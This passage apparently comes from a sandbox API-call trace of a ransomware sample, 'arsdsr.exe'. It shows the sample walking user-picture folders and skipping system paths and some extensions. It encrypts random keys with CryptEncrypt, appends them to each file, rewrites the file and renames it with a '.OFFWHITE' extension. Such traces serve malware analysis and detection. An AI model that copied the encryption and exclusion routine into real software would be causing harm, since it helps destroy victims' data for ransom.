CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x564e10*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x564e10*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.822] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.822] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.822] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x564f18*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x564f18*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.822] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.822] SetLastError (dwErrCode=0x0) [0146.822] WriteFile (in: hFile=0xffffffff, lpBuffer=0x564e10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.822] GetLastError () returned 0x6 [0146.822] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2=".") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="..") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="...") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="windows") returned -1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="$recycle.bin") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="rsa") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="ntuser.dat") returned 1 [0146.822] lstrcmpiW (lpString1="usertile44.bmp", lpString2="programdata") returned 1 [0146.823] lstrcmpiW (lpString1="usertile44.bmp", lpString2="appdata") returned 1 [0146.823] lstrcmpiW (lpString1="usertile44.bmp", lpString2="program files") returned 1 [0146.823] lstrcmpiW (lpString1="usertile44.bmp", lpString2="program files (x86)") returned 1 [0146.823] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\" [0146.823] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile44.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" [0146.823] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.823] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.823] PathFindExtensionW (pszPath="usertile44.bmp") returned=".bmp" [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.823] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.823] lstrcmpiW (lpString1="usertile44.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.823] GetProcessHeap () returned 0x500000 [0146.823] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526aa8 [0146.824] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.824] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.824] GetProcessHeap () returned 0x500000 [0146.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a18 [0146.824] GetProcessHeap () returned 0x500000 [0146.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a30 [0146.824] GetProcessHeap () returned 0x500000 [0146.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565020 [0146.824] GetProcessHeap () returned 0x500000 [0146.824] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565128 [0146.824] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.824] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.824] SystemFunction036 (in: RandomBuffer=0x543a18, RandomBufferLength=0x10 | out: RandomBuffer=0x543a18) returned 1 [0146.824] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.824] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.824] SystemFunction036 (in: RandomBuffer=0x543a30, RandomBufferLength=0x10 | out: RandomBuffer=0x543a30) returned 1 [0146.824] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.824] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.825] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565020*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x565020*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.825] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.825] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.825] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565128*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x565128*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.825] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.825] SetLastError (dwErrCode=0x0) [0146.825] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565020, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.825] GetLastError () returned 0x6 [0146.825] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x295d83c, dwReserved1=0xc63907c9, cFileName="usertile44.bmp", cAlternateFileName="")) returned 0 [0146.825] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.826] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2=".") returned 1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="..") returned 1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="...") returned 1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="windows") returned -1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="$recycle.bin") returned 1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="rsa") returned -1 [0146.826] lstrcmpiW (lpString1="guest.bmp", lpString2="ntuser.dat") returned -1 [0146.827] lstrcmpiW (lpString1="guest.bmp", lpString2="programdata") returned -1 [0146.827] lstrcmpiW (lpString1="guest.bmp", lpString2="appdata") returned 1 [0146.827] lstrcmpiW (lpString1="guest.bmp", lpString2="program files") returned -1 [0146.827] lstrcmpiW (lpString1="guest.bmp", lpString2="program files (x86)") returned -1 [0146.827] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.827] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="guest.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" [0146.827] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.827] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.827] PathFindExtensionW (pszPath="guest.bmp") returned=".bmp" [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.827] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.827] lstrcmpiW (lpString1="guest.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0146.827] GetProcessHeap () returned 0x500000 [0146.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ab8 [0146.828] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0146.828] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=49208) returned 1 [0146.828] GetProcessHeap () returned 0x500000 [0146.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0146.828] GetProcessHeap () returned 0x500000 [0146.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0146.828] GetProcessHeap () returned 0x500000 [0146.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0146.828] GetProcessHeap () returned 0x500000 [0146.828] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0146.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.829] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0146.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.829] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0146.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.829] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295dc90*=0x100) returned 1 [0146.829] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.829] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.829] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0146.829] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc038, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.829] SetLastError (dwErrCode=0x0) [0146.830] WriteFile (in: hFile=0x21c, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.835] GetLastError () returned 0x0 [0146.835] GetLastError () returned 0x0 [0146.835] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc138, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.835] WriteFile (in: hFile=0x21c, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.835] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc238, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.835] WriteFile (in: hFile=0x21c, lpBuffer=0x526ab8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526ab8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0146.835] GetProcessHeap () returned 0x500000 [0146.835] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc038) returned 0x5667c8 [0146.835] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.835] ReadFile (in: hFile=0x21c, lpBuffer=0x5667c8, nNumberOfBytesToRead=0xc038, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295dec0*=0xc038, lpOverlapped=0x0) returned 1 [0146.840] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.841] WriteFile (in: hFile=0x21c, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0xc038, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295decc*=0xc038, lpOverlapped=0x0) returned 1 [0146.841] GetProcessHeap () returned 0x500000 [0146.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0146.841] CloseHandle (hObject=0x21c) returned 1 [0146.841] GetProcessHeap () returned 0x500000 [0146.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0146.841] GetProcessHeap () returned 0x500000 [0146.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0146.841] GetProcessHeap () returned 0x500000 [0146.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0146.841] GetProcessHeap () returned 0x500000 [0146.841] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0146.841] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" [0146.842] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.OFFWHITE" [0146.842] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp"), lpNewFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\guest.bmp.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\guest.bmp.offwhite")) returned 1 [0146.842] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2=".") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="..") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="...") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="windows") returned -1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="$recycle.bin") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="rsa") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="ntuser.dat") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="programdata") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="appdata") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="program files") returned 1 [0146.843] lstrcmpiW (lpString1="user.bmp", lpString2="program files (x86)") returned 1 [0146.843] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\" [0146.843] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\", lpString2="user.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" [0146.843] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.843] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.843] PathFindExtensionW (pszPath="user.bmp") returned=".bmp" [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0146.843] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0146.844] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0146.844] lstrcmpiW (lpString1="user.bmp", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.844] GetProcessHeap () returned 0x500000 [0146.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526ac8 [0146.844] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0146.844] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=49208) returned 1 [0146.844] GetProcessHeap () returned 0x500000 [0146.844] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0146.845] GetProcessHeap () returned 0x500000 [0146.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0146.845] GetProcessHeap () returned 0x500000 [0146.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0146.845] GetProcessHeap () returned 0x500000 [0146.845] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0146.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.845] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0146.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.845] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0146.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.845] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295dc90*=0x100) returned 1 [0146.845] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.845] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.845] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0146.846] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc038, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.846] SetLastError (dwErrCode=0x0) [0146.846] WriteFile (in: hFile=0x21c, lpBuffer=0x565338*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565338*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.848] GetLastError () returned 0x0 [0146.848] GetLastError () returned 0x0 [0146.848] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc138, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.848] WriteFile (in: hFile=0x21c, lpBuffer=0x565230*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x565230*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0146.848] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xc238, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.848] WriteFile (in: hFile=0x21c, lpBuffer=0x526ac8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x526ac8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0146.848] GetProcessHeap () returned 0x500000 [0146.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xc038) returned 0x5667c8 [0146.848] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.849] ReadFile (in: hFile=0x21c, lpBuffer=0x5667c8, nNumberOfBytesToRead=0xc038, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesRead=0x295dec0*=0xc038, lpOverlapped=0x0) returned 1 [0146.853] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.853] WriteFile (in: hFile=0x21c, lpBuffer=0x5667c8*, nNumberOfBytesToWrite=0xc038, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5667c8*, lpNumberOfBytesWritten=0x295decc*=0xc038, lpOverlapped=0x0) returned 1 [0146.853] GetProcessHeap () returned 0x500000 [0146.853] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5667c8 | out: hHeap=0x500000) returned 1 [0146.853] CloseHandle (hObject=0x21c) returned 1 [0146.853] GetProcessHeap () returned 0x500000 [0146.853] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0146.853] GetProcessHeap () returned 0x500000 [0146.853] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0146.853] GetProcessHeap () returned 0x500000 [0146.853] HeapFree (in: hHeap=0x500000, 